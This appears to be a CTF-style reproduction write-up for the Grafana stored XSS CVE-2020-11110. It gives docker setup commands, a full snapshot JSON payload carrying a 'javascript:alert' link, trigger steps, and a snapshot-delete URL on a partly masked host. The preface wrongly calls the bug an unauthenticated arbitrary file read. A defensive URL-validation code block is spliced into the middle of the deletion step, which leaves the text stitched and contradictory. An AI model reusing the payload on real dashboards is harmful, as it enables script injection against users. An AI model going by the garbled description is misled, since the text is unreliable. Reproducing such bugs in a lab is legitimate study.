Grafana stored XSS vulnerability (CVE-2020-11110)


Preface

  Grafana is a cross-platform, open-source data visualisation web application platform. Once a user has configured a connected data source, Grafana can display charts and alerts for that data in a web browser. Grafana has an unauthenticated arbitrary file read vulnerability: an attacker can use it to read arbitrary files on the host without authenticating.

CVE ID:
    CVE-2020-11110
Affected versions:
    Grafana v6.2.5
Links
    https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

Reproduction notes

Test environment setup

docker pull grafana/grafana:6.2.5
docker run -d -p 3000:3000 --name=grafana grafana/grafana:6.2.5

PoC test

  payload =>

{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}

Stored-XSS

Replace localhost in the URL, open the snapshot address, and click the link 🔗 icon. The stored XSS fires.

Snapshot deletion

Visit the deleteUrl:
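The root cause shown above is that the snapshot's originalUrl is rendered as a link href without restricting its scheme, so a javascript: value runs when the icon is clicked. The following is an added example (not Grafana's own code) of the check a defender wants on that field: parse the value with the WHATWG URL parser and accept only http: and https:. The payload object is the one from this page, trimmed to the fields that matter; the function names are my own.

```javascript
// Added example, not Grafana's code: validate a snapshot's originalUrl before it is
// stored or rendered as an <a href>. Only http: and https: are accepted; anything
// else, including the javascript: scheme used in the PoC above, is rejected.

// The PoC body from this page, reduced to the relevant fields (constructed sample).
const poc = {
  dashboard: {
    snapshot: {
      originalUrl: "javascript:alert('Revers3c')",
      timestamp: "2020-03-30T01:24:44.529Z",
    },
    title: "Dashboard",
  },
  name: "Dashboard",
  expires: 0,
};

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns the normalised URL string, or null if it must not be used as an href.
// new URL() lowercases the scheme, so "JAVASCRIPT:" and " javascript:" (after
// trim) are both caught; relative or malformed values throw and are rejected too.
function safeOriginalUrl(value) {
  if (typeof value !== "string") return null;
  let parsed;
  try {
    parsed = new URL(value.trim());
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Hypothetical server-side check for an incoming snapshot body: an absent or
// empty originalUrl is fine; a present but unsafe one rejects the request.
function validateSnapshotBody(body) {
  const url = body && body.dashboard && body.dashboard.snapshot
    ? body.dashboard.snapshot.originalUrl
    : undefined;
  if (url === undefined || url === null || url === "") return { ok: true };
  const safe = safeOriginalUrl(url);
  return safe === null
    ? { ok: false, reason: "originalUrl must use http or https" }
    : { ok: true, originalUrl: safe };
}

// Run stand-alone: the PoC body is rejected, a normal dashboard URL passes.
console.log(validateSnapshotBody(poc));
console.log(safeOriginalUrl("http://localhost:3000/d/abc/dashboard"));
```

The same allow-list belongs in the front end as well, so that a value already stored by an older version is never rendered as a clickable href; rejecting on input alone does not clean up existing snapshots.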

http://103.210.xx.xx:3000/api/snapshots-delete/o3ITlrkiwgJexFmCJxr4gsNZ8QDcc0eQ

The snapshot can be deleted; this counts as a more severe vulnerability.

Fix

Upgrade to a patched version.

Refer

https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

That's all!

